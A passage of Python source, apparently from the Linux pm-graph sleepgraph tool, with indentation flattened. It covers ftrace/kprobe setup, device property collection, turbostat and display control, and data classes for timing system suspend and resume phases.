bmax = (1*1024*1024) if self.suspendmode in ['disk', 'command'] \
else (3*1024*1024)
tgtsize = min(self.memfree, bmax)
else:
tgtsize = 65536
while not self.fsetVal('%d' % (tgtsize // cpus), 'buffer_size_kb'):
# if the size failed to set, lower it and keep trying
tgtsize -= 65536
if tgtsize < 65536:
tgtsize = int(self.fgetVal('buffer_size_kb')) * cpus
break
self.vprint('Setting trace buffers to %d kB (%d kB per cpu)' % (tgtsize, tgtsize/cpus))
# initialize the callgraph trace
if(self.usecallgraph):
# set trace type
self.fsetVal('function_graph', 'current_tracer')
self.fsetVal('', 'set_ftrace_filter')
# set trace format options
self.fsetVal('print-parent', 'trace_options')
self.fsetVal('funcgraph-abstime', 'trace_options')
self.fsetVal('funcgraph-cpu', 'trace_options')
self.fsetVal('funcgraph-duration', 'trace_options')
self.fsetVal('funcgraph-proc', 'trace_options')
self.fsetVal('funcgraph-tail', 'trace_options')
self.fsetVal('nofuncgraph-overhead', 'trace_options')
self.fsetVal('context-info', 'trace_options')
self.fsetVal('graph-time', 'trace_options')
self.fsetVal('%d' % self.max_graph_depth, 'max_graph_depth')
cf = ['dpm_run_callback']
if(self.usetraceevents):
cf += ['dpm_prepare', 'dpm_complete']
for fn in self.tracefuncs:
if 'func' in self.tracefuncs[fn]:
cf.append(self.tracefuncs[fn]['func'])
else:
cf.append(fn)
if self.ftop:
self.setFtraceFilterFunctions([self.ftopfunc])
else:
self.setFtraceFilterFunctions(cf)
# initialize the kprobe trace
elif self.usekprobes:
for name in self.tracefuncs:
self.defaultKprobe(name, self.tracefuncs[name])
if self.usedevsrc:
for name in self.dev_tracefuncs:
self.defaultKprobe(name, self.dev_tracefuncs[name])
if not quiet:
pprint('INITIALIZING KPROBES...')
self.addKprobes(self.verbose)
if(self.usetraceevents):
# turn trace events on
events = iter(self.traceevents)
for e in events:
self.fsetVal('1', 'events/power/'+e+'/enable')
# clear the trace buffer
self.fsetVal('', 'trace')
def verifyFtrace(self):
# files needed for any trace data
files = ['buffer_size_kb', 'current_tracer', 'trace', 'trace_clock',
'trace_marker', 'trace_options', 'tracing_on']
# files needed for callgraph trace data
tp = self.tpath
if(self.usecallgraph):
files += [
'available_filter_functions',
'set_ftrace_filter',
'set_graph_function'
]
for f in files:
if(os.path.exists(tp+f) == False):
return False
return True
def verifyKprobes(self):
# files needed for kprobes to work
files = ['kprobe_events', 'events']
tp = self.tpath
for f in files:
if(os.path.exists(tp+f) == False):
return False
return True
def colorText(self, str, color=31):
if not self.ansi:
return str
return '\x1B[%d;40m%s\x1B[m' % (color, str)
def writeDatafileHeader(self, filename, testdata):
fp = self.openlog(filename, 'w')
fp.write('%s\n%s\n# command | %s\n' % (self.teststamp, self.sysstamp, self.cmdline))
for test in testdata:
if 'fw' in test:
fw = test['fw']
if(fw):
fp.write('# fwsuspend %u fwresume %u\n' % (fw[0], fw[1]))
if 'turbo' in test:
fp.write('# turbostat %s\n' % test['turbo'])
if 'wifi' in test:
fp.write('# wifi %s\n' % test['wifi'])
if test['error'] or len(testdata) > 1:
fp.write('# enter_sleep_error %s\n' % test['error'])
return fp
def sudoUserchown(self, dir):
if os.path.exists(dir) and self.sudouser:
cmd = 'chown -R {0}:{0} {1} > /dev/null 2>&1'
call(cmd.format(self.sudouser, dir), shell=True)
def outputResult(self, testdata, num=0):
if not self.result:
return
n = ''
if num > 0:
n = '%d' % num
fp = open(self.result, 'a')
if 'error' in testdata:
fp.write('result%s: fail\n' % n)
fp.write('error%s: %s\n' % (n, testdata['error']))
else:
fp.write('result%s: pass\n' % n)
for v in ['suspend', 'resume', 'boot', 'lastinit']:
if v in testdata:
fp.write('%s%s: %.3f\n' % (v, n, testdata[v]))
for v in ['fwsuspend', 'fwresume']:
if v in testdata:
fp.write('%s%s: %.3f\n' % (v, n, testdata[v] / 1000000.0))
if 'bugurl' in testdata:
fp.write('url%s: %s\n' % (n, testdata['bugurl']))
fp.close()
self.sudoUserchown(self.result)
def configFile(self, file):
dir = os.path.dirname(os.path.realpath(__file__))
if os.path.exists(file):
return file
elif os.path.exists(dir+'/'+file):
return dir+'/'+file
elif os.path.exists(dir+'/config/'+file):
return dir+'/config/'+file
return ''
def openlog(self, filename, mode):
isgz = self.gzip
if mode == 'r':
try:
with gzip.open(filename, mode+'t') as fp:
test = fp.read(64)
isgz = True
except:
isgz = False
if isgz:
return gzip.open(filename, mode+'t')
return open(filename, mode)
def putlog(self, filename, text):
with self.openlog(filename, 'a') as fp:
fp.write(text)
fp.close()
def dlog(self, text):
self.putlog(self.dmesgfile, '# %s\n' % text)
def flog(self, text):
self.putlog(self.ftracefile, text)
def b64unzip(self, data):
try:
out = codecs.decode(base64.b64decode(data), 'zlib').decode()
except:
out = data
return out
def b64zip(self, data):
out = base64.b64encode(codecs.encode(data.encode(), 'zlib')).decode()
return out
def platforminfo(self, cmdafter):
# add platform info on to a completed ftrace file
if not os.path.exists(self.ftracefile):
return False
footer = '#\n'
# add test command string line if need be
if self.suspendmode == 'command' and self.testcommand:
footer += '# platform-testcmd: %s\n' % (self.testcommand)
# get a list of target devices from the ftrace file
props = dict()
tp = TestProps()
tf = self.openlog(self.ftracefile, 'r')
for line in tf:
if tp.stampInfo(line, self):
continue
# parse only valid lines, if this is not one move on
m = re.match(tp.ftrace_line_fmt, line)
if(not m or 'device_pm_callback_start' not in line):
continue
m = re.match('.*: (?P<drv>.*) (?P<d>.*), parent: *(?P<p>.*), .*', m.group('msg'));
if(not m):
continue
dev = m.group('d')
if dev not in props:
props[dev] = DevProps()
tf.close()
# now get the syspath for each target device
for dirname, dirnames, filenames in os.walk('/sys/devices'):
if(re.match('.*/power', dirname) and 'async' in filenames):
dev = dirname.split('/')[-2]
if dev in props and (not props[dev].syspath or len(dirname) < len(props[dev].syspath)):
props[dev].syspath = dirname[:-6]
# now fill in the properties for our target devices
for dev in sorted(props):
dirname = props[dev].syspath
if not dirname or not os.path.exists(dirname):
continue
with open(dirname+'/power/async') as fp:
text = fp.read()
props[dev].isasync = False
if 'enabled' in text:
props[dev].isasync = True
fields = os.listdir(dirname)
if 'product' in fields:
with open(dirname+'/product', 'rb') as fp:
props[dev].altname = ascii(fp.read())
elif 'name' in fields:
with open(dirname+'/name', 'rb') as fp:
props[dev].altname = ascii(fp.read())
elif 'model' in fields:
with open(dirname+'/model', 'rb') as fp:
props[dev].altname = ascii(fp.read())
elif 'description' in fields:
with open(dirname+'/description', 'rb') as fp:
props[dev].altname = ascii(fp.read())
elif 'id' in fields:
with open(dirname+'/id', 'rb') as fp:
props[dev].altname = ascii(fp.read())
elif 'idVendor' in fields and 'idProduct' in fields:
idv, idp = '', ''
with open(dirname+'/idVendor', 'rb') as fp:
idv = ascii(fp.read()).strip()
with open(dirname+'/idProduct', 'rb') as fp:
idp = ascii(fp.read()).strip()
props[dev].altname = '%s:%s' % (idv, idp)
if props[dev].altname:
out = props[dev].altname.strip().replace('\n', ' ')\
.replace(',', ' ').replace(';', ' ')
props[dev].altname = out
# add a devinfo line to the bottom of ftrace
out = ''
for dev in sorted(props):
out += props[dev].out(dev)
footer += '# platform-devinfo: %s\n' % self.b64zip(out)
# add a line for each of these commands with their outputs
for name, cmdline, info in cmdafter:
footer += '# platform-%s: %s | %s\n' % (name, cmdline, self.b64zip(info))
self.flog(footer)
return True
def commonPrefix(self, list):
if len(list) < 2:
return ''
prefix = list[0]
for s in list[1:]:
while s[:len(prefix)] != prefix and prefix:
prefix = prefix[:len(prefix)-1]
if not prefix:
break
if '/' in prefix and prefix[-1] != '/':
prefix = prefix[0:prefix.rfind('/')+1]
return prefix
def dictify(self, text, format):
out = dict()
header = True if format == 1 else False
delim = ' ' if format == 1 else ':'
for line in text.split('\n'):
if header:
header, out['@'] = False, line
continue
line = line.strip()
if delim in line:
data = line.split(delim, 1)
num = re.search(r'[\d]+', data[1])
if format == 2 and num:
out[data[0].strip()] = num.group()
else:
out[data[0].strip()] = data[1]
return out
def cmdinfo(self, begin, debug=False):
out = []
if begin:
self.cmd1 = dict()
for cargs in self.infocmds:
delta, name = cargs[0], cargs[1]
cmdline, cmdpath = ' '.join(cargs[2:]), self.getExec(cargs[2])
if not cmdpath or (begin and not delta):
continue
self.dlog('[%s]' % cmdline)
try:
fp = Popen([cmdpath]+cargs[3:], stdout=PIPE, stderr=PIPE).stdout
info = ascii(fp.read()).strip()
fp.close()
except:
continue
if not debug and begin:
self.cmd1[name] = self.dictify(info, delta)
elif not debug and delta and name in self.cmd1:
before, after = self.cmd1[name], self.dictify(info, delta)
dinfo = ('\t%s\n' % before['@']) if '@' in before else ''
prefix = self.commonPrefix(list(before.keys()))
for key in sorted(before):
if key in after and before[key] != after[key]:
title = key.replace(prefix, '')
if delta == 2:
dinfo += '\t%s : %s -> %s\n' % \
(title, before[key].strip(), after[key].strip())
else:
dinfo += '%10s (start) : %s\n%10s (after) : %s\n' % \
(title, before[key], title, after[key])
dinfo = '\tnothing changed' if not dinfo else dinfo.rstrip()
out.append((name, cmdline, dinfo))
else:
out.append((name, cmdline, '\tnothing' if not info else info))
return out
def testVal(self, file, fmt='basic', value=''):
if file == 'restoreall':
for f in self.cfgdef:
if os.path.exists(f):
fp = open(f, 'w')
fp.write(self.cfgdef[f])
fp.close()
self.cfgdef = dict()
elif value and os.path.exists(file):
fp = open(file, 'r+')
if fmt == 'radio':
m = re.match('.*\[(?P<v>.*)\].*', fp.read())
if m:
self.cfgdef[file] = m.group('v')
elif fmt == 'acpi':
line = fp.read().strip().split('\n')[-1]
m = re.match('.* (?P<v>[0-9A-Fx]*) .*', line)
if m:
self.cfgdef[file] = m.group('v')
else:
self.cfgdef[file] = fp.read().strip()
fp.write(value)
fp.close()
def haveTurbostat(self):
if not self.tstat:
return False
cmd = self.getExec('turbostat')
if not cmd:
return False
fp = Popen([cmd, '-v'], stdout=PIPE, stderr=PIPE).stderr
out = ascii(fp.read()).strip()
fp.close()
if re.match('turbostat version .*', out):
self.vprint(out)
return True
return False
def turbostat(self):
cmd = self.getExec('turbostat')
rawout = keyline = valline = ''
fullcmd = '%s -q -S echo freeze > %s' % (cmd, self.powerfile)
fp = Popen(['sh', '-c', fullcmd], stdout=PIPE, stderr=PIPE).stderr
for line in fp:
line = ascii(line)
rawout += line
if keyline and valline:
continue
if re.match('(?i)Avg_MHz.*', line):
keyline = line.strip().split()
elif keyline:
valline = line.strip().split()
fp.close()
if not keyline or not valline or len(keyline) != len(valline):
errmsg = 'unrecognized turbostat output:\n'+rawout.strip()
self.vprint(errmsg)
if not self.verbose:
pprint(errmsg)
return ''
if self.verbose:
pprint(rawout.strip())
out = []
for key in keyline:
idx = keyline.index(key)
val = valline[idx]
out.append('%s=%s' % (key, val))
return '|'.join(out)
def wifiDetails(self, dev):
try:
info = open('/sys/class/net/%s/device/uevent' % dev, 'r').read().strip()
except:
return dev
vals = [dev]
for prop in info.split('\n'):
if prop.startswith('DRIVER=') or prop.startswith('PCI_ID='):
vals.append(prop.split('=')[-1])
return ':'.join(vals)
def checkWifi(self, dev=''):
try:
w = open('/proc/net/wireless', 'r').read().strip()
except:
return ''
for line in reversed(w.split('\n')):
m = re.match(' *(?P<dev>.*): (?P<stat>[0-9a-f]*) .*', w.split('\n')[-1])
if not m or (dev and dev != m.group('dev')):
continue
return m.group('dev')
return ''
def pollWifi(self, dev, timeout=60):
start = time.time()
while (time.time() - start) < timeout:
w = self.checkWifi(dev)
if w:
return '%s reconnected %.2f' % \
(self.wifiDetails(dev), max(0, time.time() - start))
time.sleep(0.01)
return '%s timeout %d' % (self.wifiDetails(dev), timeout)
def errorSummary(self, errinfo, msg):
found = False
for entry in errinfo:
if re.match(entry['match'], msg):
entry['count'] += 1
if self.hostname not in entry['urls']:
entry['urls'][self.hostname] = [self.htmlfile]
elif self.htmlfile not in entry['urls'][self.hostname]:
entry['urls'][self.hostname].append(self.htmlfile)
found = True
break
if found:
return
arr = msg.split()
for j in range(len(arr)):
if re.match('^[0-9,\-\.]*$', arr[j]):
arr[j] = '[0-9,\-\.]*'
else:
arr[j] = arr[j]\
.replace('\\', '\\\\').replace(']', '\]').replace('[', '\[')\
.replace('.', '\.').replace('+', '\+').replace('*', '\*')\
.replace('(', '\(').replace(')', '\)').replace('}', '\}')\
.replace('{', '\{')
mstr = ' *'.join(arr)
entry = {
'line': msg,
'match': mstr,
'count': 1,
'urls': {self.hostname: [self.htmlfile]}
}
errinfo.append(entry)
def multistat(self, start, idx, finish):
if 'time' in self.multitest:
id = '%d Duration=%dmin' % (idx+1, self.multitest['time'])
else:
id = '%d/%d' % (idx+1, self.multitest['count'])
t = time.time()
if 'start' not in self.multitest:
self.multitest['start'] = self.multitest['last'] = t
self.multitest['total'] = 0.0
pprint('TEST (%s) START' % id)
return
dt = t - self.multitest['last']
if not start:
if idx == 0 and self.multitest['delay'] > 0:
self.multitest['total'] += self.multitest['delay']
pprint('TEST (%s) COMPLETE -- Duration %.1fs' % (id, dt))
return
self.multitest['total'] += dt
self.multitest['last'] = t
avg = self.multitest['total'] / idx
if 'time' in self.multitest:
left = finish - datetime.now()
left -= timedelta(microseconds=left.microseconds)
else:
left = timedelta(seconds=((self.multitest['count'] - idx) * int(avg)))
pprint('TEST (%s) START - Avg Duration %.1fs, Time left %s' % \
(id, avg, str(left)))
def multiinit(self, c, d):
sz, unit = 'count', 'm'
if c.endswith('d') or c.endswith('h') or c.endswith('m'):
sz, unit, c = 'time', c[-1], c[:-1]
self.multitest['run'] = True
self.multitest[sz] = getArgInt('multi: n d (exec count)', c, 1, 1000000, False)
self.multitest['delay'] = getArgInt('multi: n d (delay between tests)', d, 0, 3600, False)
if unit == 'd':
self.multitest[sz] *= 1440
elif unit == 'h':
self.multitest[sz] *= 60
def displayControl(self, cmd):
xset, ret = 'timeout 10 xset -d :0.0 {0}', 0
if self.sudouser:
xset = 'sudo -u %s %s' % (self.sudouser, xset)
if cmd == 'init':
ret = call(xset.format('dpms 0 0 0'), shell=True)
if not ret:
ret = call(xset.format('s off'), shell=True)
elif cmd == 'reset':
ret = call(xset.format('s reset'), shell=True)
elif cmd in ['on', 'off', 'standby', 'suspend']:
b4 = self.displayControl('stat')
ret = call(xset.format('dpms force %s' % cmd), shell=True)
if not ret:
curr = self.displayControl('stat')
self.vprint('Display Switched: %s -> %s' % (b4, curr))
if curr != cmd:
self.vprint('WARNING: Display failed to change to %s' % cmd)
if ret:
self.vprint('WARNING: Display failed to change to %s with xset' % cmd)
return ret
elif cmd == 'stat':
fp = Popen(xset.format('q').split(' '), stdout=PIPE).stdout
ret = 'unknown'
for line in fp:
m = re.match('[\s]*Monitor is (?P<m>.*)', ascii(line))
if(m and len(m.group('m')) >= 2):
out = m.group('m').lower()
ret = out[3:] if out[0:2] == 'in' else out
break
fp.close()
return ret
def setRuntimeSuspend(self, before=True):
if before:
# runtime suspend disable or enable
if self.rs > 0:
self.rstgt, self.rsval, self.rsdir = 'on', 'auto', 'enabled'
else:
self.rstgt, self.rsval, self.rsdir = 'auto', 'on', 'disabled'
pprint('CONFIGURING RUNTIME SUSPEND...')
self.rslist = deviceInfo(self.rstgt)
for i in self.rslist:
self.setVal(self.rsval, i)
pprint('runtime suspend %s on all devices (%d changed)' % (self.rsdir, len(self.rslist)))
pprint('waiting 5 seconds...')
time.sleep(5)
else:
# runtime suspend re-enable or re-disable
for i in self.rslist:
self.setVal(self.rstgt, i)
pprint('runtime suspend settings restored on %d devices' % len(self.rslist))
sysvals = SystemValues()
switchvalues = ['enable', 'disable', 'on', 'off', 'true', 'false', '1', '0']
switchoff = ['disable', 'off', 'false', '0']
suspendmodename = {
'freeze': 'Freeze (S0)',
'standby': 'Standby (S1)',
'mem': 'Suspend (S3)',
'disk': 'Hibernate (S4)'
}
# Class: DevProps
# Description:
# Simple class which holds property values collected
# for all the devices used in the timeline.
class DevProps:
def __init__(self):
self.syspath = ''
self.altname = ''
self.isasync = True
self.xtraclass = ''
self.xtrainfo = ''
def out(self, dev):
return '%s,%s,%d;' % (dev, self.altname, self.isasync)
def debug(self, dev):
pprint('%s:\n\taltname = %s\n\t async = %s' % (dev, self.altname, self.isasync))
def altName(self, dev):
if not self.altname or self.altname == dev:
return dev
return '%s [%s]' % (self.altname, dev)
def xtraClass(self):
if self.xtraclass:
return ' '+self.xtraclass
if not self.isasync:
return ' sync'
return ''
def xtraInfo(self):
if self.xtraclass:
return ' '+self.xtraclass
if self.isasync:
return ' (async)'
return ' (sync)'
# Class: DeviceNode
# Description:
# A container used to create a device hierachy, with a single root node
# and a tree of child nodes. Used by Data.deviceTopology()
class DeviceNode:
def __init__(self, nodename, nodedepth):
self.name = nodename
self.children = []
self.depth = nodedepth
# Class: Data
# Description:
# The primary container for suspend/resume test data. There is one for
# each test run. The data is organized into a cronological hierarchy:
# Data.dmesg {
# phases {
# 10 sequential, non-overlapping phases of S/R
# contents: times for phase start/end, order/color data for html
# devlist {
# device callback or action list for this phase
# device {
# a single device callback or generic action
# contents: start/stop times, pid/cpu/driver info
# parents/children, html id for timeline/callgraph
# optionally includes an ftrace callgraph
# optionally includes dev/ps data
# }
# }
# }
# }
#
class Data:
phasedef = {
'suspend_prepare': {'order': 0, 'color': '#CCFFCC'},
'suspend': {'order': 1, 'color': '#88FF88'},
'suspend_late': {'order': 2, 'color': '#00AA00'},
'suspend_noirq': {'order': 3, 'color': '#008888'},
'suspend_machine': {'order': 4, 'color': '#0000FF'},
'resume_machine': {'order': 5, 'color': '#FF0000'},
'resume_noirq': {'order': 6, 'color': '#FF9900'},
'resume_early': {'order': 7, 'color': '#FFCC00'},
'resume': {'order': 8, 'color': '#FFFF88'},
'resume_complete': {'order': 9, 'color': '#FFFFCC'},
}
errlist = {
'HWERROR' : r'.*\[ *Hardware Error *\].*',
'FWBUG' : r'.*\[ *Firmware Bug *\].*',
'BUG' : r'(?i).*\bBUG\b.*',
'ERROR' : r'(?i).*\bERROR\b.*',
'WARNING' : r'(?i).*\bWARNING\b.*',
'FAULT' : r'(?i).*\bFAULT\b.*',
'FAIL' : r'(?i).*\bFAILED\b.*',
'INVALID' : r'(?i).*\bINVALID\b.*',
'CRASH' : r'(?i).*\bCRASHED\b.*',
'TIMEOUT' : r'(?i).*\bTIMEOUT\b.*',
'IRQ' : r'.*\bgenirq: .*',
'TASKFAIL': r'.*Freezing of tasks *.*',
'ACPI' : r'.*\bACPI *(?P<b>[A-Za-z]*) *Error[: ].*',
'DISKFULL': r'.*\bNo space left on device.*',
'USBERR' : r'.*usb .*device .*, error [0-9-]*',
'ATAERR' : r' *ata[0-9\.]*: .*failed.*',
'MEIERR' : r' *mei.*: .*failed.*',
'TPMERR' : r'(?i) *tpm *tpm[0-9]*: .*error.*',
}
def __init__(self, num):
idchar = 'abcdefghij'
self.start = 0.0 # test start
self.end = 0.0 # test end
self.hwstart = 0 # rtc test start
self.hwend = 0 # rtc test end
self.tSuspended = 0.0 # low-level suspend start
self.tResumed = 0.0 # low-level resume start
self.tKernSus = 0.0 # kernel level suspend start
self.tKernRes = 0.0 # kernel level resume end
self.fwValid = False # is firmware data available
self.fwSuspend = 0 # time spent in firmware suspend
self.fwResume = 0 # time spent in firmware resume
self.html_device_id = 0
self.stamp = 0
self.outfile = ''
self.kerror = False
self.wifi = dict()
self.turbostat = 0
self.enterfail = ''
self.currphase = ''
self.pstl = dict() # process timeline
self.testnumber = num
self.idstr = idchar[num]
self.dmesgtext = [] # dmesg text file in memory
self.dmesg = dict() # root data structure
self.errorinfo = {'suspend':[],'resume':[]}
self.tLow = [] # time spent in low-level suspends (standby/freeze)
self.devpids = []
self.devicegroups = 0
def sortedPhases(self):
return sorted(self.dmesg, key=lambda k:self.dmesg[k]['order'])
def initDevicegroups(self):
# called when phases are all finished being added
for phase in sorted(self.dmesg.keys()):
if '*' in phase:
p = phase.split('*')
pnew = '%s%d' % (p[0], len(p))
self.dmesg[pnew] = self.dmesg.pop(phase)
self.devicegroups = []
for phase in self.sortedPhases():
self.devicegroups.append([phase])
def nextPhase(self, phase, offset):
order = self.dmesg[phase]['order'] + offset
for p in self.dmesg:
if self.dmesg[p]['order'] == order:
return p
return ''
def lastPhase(self, depth=1):
plist = self.sortedPhases()
if len(plist) < depth:
return ''
return plist[-1*depth]
def turbostatInfo(self):
tp = TestProps()
out = {'syslpi':'N/A','pkgpc10':'N/A'}
for line in self.dmesgtext:
m = re.match(tp.tstatfmt, line)
if not m:
continue
for i in m.group('t').split('|'):
if 'SYS%LPI' in i:
out['syslpi'] = i.split('=')[-1]+'%'
elif 'pc10' in i:
out['pkgpc10'] = i.split('=')[-1]+'%'
break
return out
def extractErrorInfo(self):
lf = self.dmesgtext
if len(self.dmesgtext) < 1 and sysvals.dmesgfile:
lf = sysvals.openlog(sysvals.dmesgfile, 'r')
i = 0
tp = TestProps()
list = []
for line in lf:
i += 1
if tp.stampInfo(line, sysvals):
continue
m = re.match('[ \t]*(\[ *)(?P<ktime>[0-9\.]*)(\]) (?P<msg>.*)', line)
if not m:
continue
t = float(m.group('ktime'))
if t < self.start or t > self.end:
continue
dir = 'suspend' if t < self.tSuspended else 'resume'
msg = m.group('msg')
if re.match('capability: warning: .*', msg):
continue
for err in self.errlist:
if re.match(self.errlist[err], msg):
list.append((msg, err, dir, t, i, i))
self.kerror = True
break
tp.msglist = []
for msg, type, dir, t, idx1, idx2 in list:
tp.msglist.append(msg)
self.errorinfo[dir].append((type, t, idx1, idx2))
if self.kerror:
sysvals.dmesglog = True
if len(self.dmesgtext) < 1 and sysvals.dmesgfile:
lf.close()
return tp
def setStart(self, time, msg=''):
self.start = time
if msg:
try:
self.hwstart = datetime.strptime(msg, sysvals.tmstart)
except:
self.hwstart = 0
def setEnd(self, time, msg=''):
self.end = time
if msg:
try:
self.hwend = datetime.strptime(msg, sysvals.tmend)
except:
self.hwend = 0
def isTraceEventOutsideDeviceCalls(self, pid, time):
for phase in self.sortedPhases():
list = self.dmesg[phase]['list']
for dev in list:
d = list[dev]
if(d['pid'] == pid and time >= d['start'] and
time < d['end']):
return False
return True
def sourcePhase(self, start):
for phase in self.sortedPhases():
if 'machine' in phase:
continue
pend = self.dmesg[phase]['end']
if start <= pend:
return phase
return 'resume_complete'
def sourceDevice(self, phaselist, start, end, pid, type):
tgtdev = ''
for phase in phaselist:
list = self.dmesg[phase]['list']
for devname in list:
dev = list[devname]
# pid must match
if dev['pid'] != pid:
continue
devS = dev['start']
devE = dev['end']
if type == 'device':
# device target event is entirely inside the source boundary
if(start < devS or start >= devE or end <= devS or end > devE):
continue
elif type == 'thread':
# thread target event will expand the source boundary
if start < devS:
dev['start'] = start
if end > devE:
dev['end'] = end
tgtdev = dev
break
return tgtdev
def addDeviceFunctionCall(self, displayname, kprobename, proc, pid, start, end, cdata, rdata):
# try to place the call in a device
phases = self.sortedPhases()
tgtdev = self.sourceDevice(phases, start, end, pid, 'device')
# calls with device pids that occur outside device bounds are dropped
# TODO: include these somehow
if not tgtdev and pid in self.devpids:
return False
# try to place the call in a thread
if not tgtdev:
tgtdev = self.sourceDevice(phases, start, end, pid, 'thread')
# create new thread blocks, expand as new calls are found
if not tgtdev:
if proc == '<...>':
threadname = 'kthread-%d' % (pid)
else:
threadname = '%s-%d' % (proc, pid)
tgtphase = self.sourcePhase(start)
self.newAction(tgtphase, threadname, pid, '', start, end, '', ' kth', '')
return self.addDeviceFunctionCall(displayname, kprobename, proc, pid, start, end, cdata, rdata)
# this should not happen
if not tgtdev:
sysvals.vprint('[%f - %f] %s-%d %s %s %s' % \
(start, end, proc, pid, kprobename, cdata, rdata))
return False
# place the call data inside the src element of the tgtdev
if('src' not in tgtdev):
tgtdev['src'] = []
dtf = sysvals.dev_tracefuncs
ubiquitous = False
if kprobename in dtf and 'ub' in dtf[kprobename]:
ubiquitous = True
title = cdata+' '+rdata
mstr = '\(.*\) *(?P<args>.*) *\((?P<caller>.*)\+.* arg1=(?P<ret>.*)'
m = re.match(mstr, title)
if m:
c = m.group('caller')
a = m.group('args').strip()
r = m.group('ret')
if len(r) > 6:
r = ''
else:
r = 'ret=%s ' % r
if ubiquitous and c in dtf and 'ub' in dtf[c]:
return False
color = sysvals.kprobeColor(kprobename)
e = DevFunction(displayname, a, c, r, start, end, ubiquitous, proc, pid, color)
tgtdev['src'].append(e)
return True
def overflowDevices(self):
# get a list of devices that extend beyond the end of this test run
devlist = []
for phase in self.sortedPhases():
list = self.dmesg[phase]['list']
for devname in list:
dev = list[devname]
if dev['end'] > self.end:
devlist.append(dev)
return devlist
def mergeOverlapDevices(self, devlist):
# merge any devices that overlap devlist
for dev in devlist:
devname = dev['name']
for phase in self.sortedPhases():
list = self.dmesg[phase]['list']
if devname not in list:
continue
tdev = list[devname]
o = min(dev['end'], tdev['end']) - max(dev['start'], tdev['start'])
if o <= 0:
continue
dev['end'] = tdev['end']
if 'src' not in dev or 'src' not in tdev:
continue
dev['src'] += tdev['src']
del list[devname]
def usurpTouchingThread(self, name, dev):
# the caller test has priority of this thread, give it to him
for phase in self.sortedPhases():
list = self.dmesg[phase]['list']
if name in list:
tdev = list[name]
if tdev['start'] - dev['end'] < 0.1:
dev['end'] = tdev['end']
if 'src' not in dev:
dev['src'] = []
if 'src' in tdev:
dev['src'] += tdev['src']
del list[name]
break
def stitchTouchingThreads(self, testlist):
# merge any threads between tests that touch
for phase in self.sortedPhases():
list = self.dmesg[phase]['list']
for devname in list:
dev = list[devname]
if 'htmlclass' not in dev or 'kth' not in dev['htmlclass']:
continue
for data in testlist:
data.usurpTouchingThread(devname, dev)
def optimizeDevSrc(self):
# merge any src call loops to reduce timeline size
for phase in self.sortedPhases():
list = self.dmesg[phase]['list']
for dev in list:
if 'src' not in list[dev]:
continue
src = list[dev]['src']
p = 0
for e in sorted(src, key=lambda event: event.time):
if not p or not e.repeat(p):
p = e
continue
# e is another iteration of p, move it into p
p.end = e.end
p.length = p.end - p.time
p.count += 1
src.remove(e)
def trimTimeVal(self, t, t0, dT, left):
if left:
if(t > t0):
if(t - dT < t0):
return t0
return t - dT
else:
return t
else:
if(t < t0 + dT):
if(t > t0):
return t0 + dT
return t + dT
else:
return t
def trimTime(self, t0, dT, left):
self.tSuspended = self.trimTimeVal(self.tSuspended, t0, dT, left)
self.tResumed = self.trimTimeVal(self.tResumed, t0, dT, left)
self.start = self.trimTimeVal(self.start, t0, dT, left)
self.tKernSus = self.trimTimeVal(self.tKernSus, t0, dT, left)
self.tKernRes = self.trimTimeVal(self.tKernRes, t0, dT, left)
self.end = self.trimTimeVal(self.end, t0, dT, left)
for phase in self.sortedPhases():
p = self.dmesg[phase]
p['start'] = self.trimTimeVal(p['start'], t0, dT, left)
p['end'] = self.trimTimeVal(p['end'], t0, dT, left)
list = p['list']
for name in list:
d = list[name]
d['start'] = self.trimTimeVal(d['start'], t0, dT, left)
d['end'] = self.trimTimeVal(d['end'], t0, dT, left)
d['length'] = d['end'] - d['start']
if('ftrace' in d):
cg = d['ftrace']
cg.start = self.trimTimeVal(cg.start, t0, dT, left)
cg.end = self.trimTimeVal(cg.end, t0, dT, left)
for line in cg.list:
line.time = self.trimTimeVal(line.time, t0, dT, left)
if('src' in d):
for e in d['src']:
e.time = self.trimTimeVal(e.time, t0, dT, left)
e.end = self.trimTimeVal(e.end, t0, dT, left)
e.length = e.end - e.time
for dir in ['suspend', 'resume']:
list = []
for e in self.errorinfo[dir]:
type, tm, idx1, idx2 = e
tm = self.trimTimeVal(tm, t0, dT, left)
list.append((type, tm, idx1, idx2))
self.errorinfo[dir] = list
def trimFreezeTime(self, tZero):
# trim out any standby or freeze clock time
lp = ''
for phase in self.sortedPhases():
if 'resume_machine' in phase and 'suspend_machine' in lp:
tS, tR = self.dmesg[lp]['end'], self.dmesg[phase]['start']
tL = tR - tS
if tL <= 0:
continue
left = True if tR > tZero else False
self.trimTime(tS, tL, left)
if 'waking' in self.dmesg[lp]:
tCnt = self.dmesg[lp]['waking'][0]
if self.dmesg[lp]['waking'][1] >= 0.001:
tTry = '-%.0f' % (round(self.dmesg[lp]['waking'][1] * 1000))
else:
tTry = '-%.3f' % (self.dmesg[lp]['waking'][1] * 1000)
text = '%.0f (%s ms waking %d times)' % (tL * 1000, tTry, tCnt)
else:
text = '%.0f' % (tL * 1000)
self.tLow.append(text)
lp = phase
def getMemTime(self):
if not self.hwstart or not self.hwend:
return
stime = (self.tSuspended - self.start) * 1000000
rtime = (self.end - self.tResumed) * 1000000
hws = self.hwstart + timedelta(microseconds=stime)
hwr = self.hwend - timedelta(microseconds=rtime)
self.tLow.append('%.0f'%((hwr - hws).total_seconds() * 1000))
def getTimeValues(self):
sktime = (self.tSuspended - self.tKernSus) * 1000
rktime = (self.tKernRes - self.tResumed) * 1000
return (sktime, rktime)
def setPhase(self, phase, ktime, isbegin, order=-1):
if(isbegin):
# phase start over current phase
if self.currphase:
if 'resume_machine' not in self.currphase:
sysvals.vprint('WARNING: phase %s failed to end' % self.currphase)
self.dmesg[self.currphase]['end'] = ktime
phases = self.dmesg.keys()
color = self.phasedef[phase]['color']
count = len(phases) if order < 0 else order
# create unique name for every new phase
while phase in phases:
phase += '*'
self.dmesg[phase] = {'list': dict(), 'start': -1.0, 'end': -1.0,
'row': 0, 'color': color, 'order': count}
self.dmesg[phase]['start'] = ktime
self.currphase = phase
else:
# phase end without a start
if phase not in self.currphase:
if self.currphase:
sysvals.vprint('WARNING: %s ended instead of %s, ftrace corruption?' % (phase, self.currphase))
else:
sysvals.vprint('WARNING: %s ended without a start, ftrace corruption?' % phase)
return phase
phase = self.currphase
self.dmesg[phase]['end'] = ktime
self.currphase = ''
return phase
def sortedDevices(self, phase):
list = self.dmesg[phase]['list']
return sorted(list, key=lambda k:list[k]['start'])
def fixupInitcalls(self, phase):
# if any calls never returned, clip them at system resume end
